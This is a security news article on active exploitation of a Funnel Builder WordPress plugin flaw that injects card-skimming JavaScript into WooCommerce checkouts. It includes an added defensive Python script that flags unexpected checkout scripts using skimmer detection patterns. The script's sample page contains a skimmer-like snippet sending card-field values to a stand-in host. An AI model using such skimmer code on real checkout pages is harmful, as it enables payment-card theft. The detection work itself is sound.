Active exploitation of Funnel Builder plugin vulnerability exposes WooCommerce payment data
Attackers are actively exploiting a critical flaw in the Funnel Builder WordPress plugin to inject malicious JavaScript into WooCommerce checkout pages, enabling payment card theft from customer transactions.
Funnel Builder is a widely deployed WordPress plugin used to construct sales funnels and landing pages, making this vulnerability particularly dangerous given its position in the payment processing chain. The flaw permits unauthenticated attackers to inject malicious JavaScript directly into checkout pages, allowing them to harvest credit card details as customers complete purchases. This is a supply-chain compromise with direct financial consequences for every merchant running the affected plugin version.
The attack surface is significant because WordPress plugins are frequently neglected by organisations that treat them as fire-and-forget installations. Plugin vulnerabilities offer attackers a reliable path to compromise thousands of shops simultaneously without needing to breach individual targets. A single unpatched plugin can become a pivot point for payment fraud affecting customer bases across multiple retailers.
Merchants using Funnel Builder with WooCommerce should immediately verify their plugin version and apply available patches. This is not an issue that can be addressed elsewhere in the application; only a plugin update or deactivation will stop the injection. Security teams should review audit logs for indicators of checkout page modification and analyse network traffic from checkout domains for exfiltration of payment data.
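One way to make the "review checkout pages for modification" step concrete is to inventory every script on a rendered checkout page and flag anything outside the merchant's expected set. The script below is an added example, not code from the article or the plugin; the allowed hosts, the sample page and the hostile hostnames (`.invalid`) are constructed, and the inline-script patterns are heuristics for card-skimmer traits, not signatures for this vulnerability.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts expected to serve checkout JavaScript (assumed inventory; replace with yours).
ALLOWED_SCRIPT_HOSTS = {"shop.example", "js.stripe.com"}
# Skimmer-like traits in inline code: card fields, field values sent off-page, string decoding.
SUSPICIOUS_PATTERNS = [
    r"(card|cc)[-_ ]?(number|num)", r"\bcv[cv]\b", r"expir",
    r"\.value\b.*(fetch\(|XMLHttpRequest|sendBeacon|new Image)",
    r"\b(atob|btoa)\(", r"String\.fromCharCode",
]

class ScriptCollector(HTMLParser):
    """Collect (src, inline body) for every <script> element on the page."""
    def __init__(self):
        super().__init__()
        self.scripts, self._src, self._buf, self._in = [], None, [], False
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in, self._src, self._buf = True, dict(attrs).get("src"), []
    def handle_data(self, data):
        if self._in:
            self._buf.append(data)
    def handle_endtag(self, tag):
        if tag == "script" and self._in:
            self.scripts.append((self._src, "".join(self._buf)))
            self._in = False

def audit_checkout_page(html, page_host, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return (script, reason) findings that deserve a manual look."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src, body in parser.scripts:
        if src:  # external script; a relative src is first-party
            host = urlparse(src).hostname or page_host
            if host != page_host and host not in allowed_hosts:
                findings.append((src, "loaded from unexpected host " + host))
        elif hits := [p for p in SUSPICIOUS_PATTERNS if re.search(p, body, re.I | re.S)]:
            findings.append(("inline", "matches: " + "; ".join(hits)))
    return findings

# Constructed sample: two expected scripts, one on an unknown host, one skimmer-like inline.
SAMPLE_CHECKOUT = """<script src="/wp-content/plugins/woocommerce/assets/js/checkout.min.js"></script>
<script src="https://js.stripe.com/v3/"></script>
<script src="https://cdn.static-assets.invalid/analytics.js"></script>
<script>var f = document.getElementById('wc-cc-number');
f.addEventListener('change', function () { var d = f.value;
  fetch('https://collect.invalid/p', {method: 'POST', body: btoa(d)}); });</script>"""
```

Run it against a checkout page fetched from the site (or saved from a browser) and diff the findings against a baseline taken before the incident; a script tag that was not there last week is the thing to investigate.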
The broader implication is that many organisations continue to operate WordPress deployments with inadequate patch management processes. Commercial payment card theft through plugin vulnerabilities remains a high-volume attack vector precisely because the remediation path is simple but often neglected. Active exploitation suggests threat actors have integrated this into automated scanning and deployment tools, making rapid patching essential.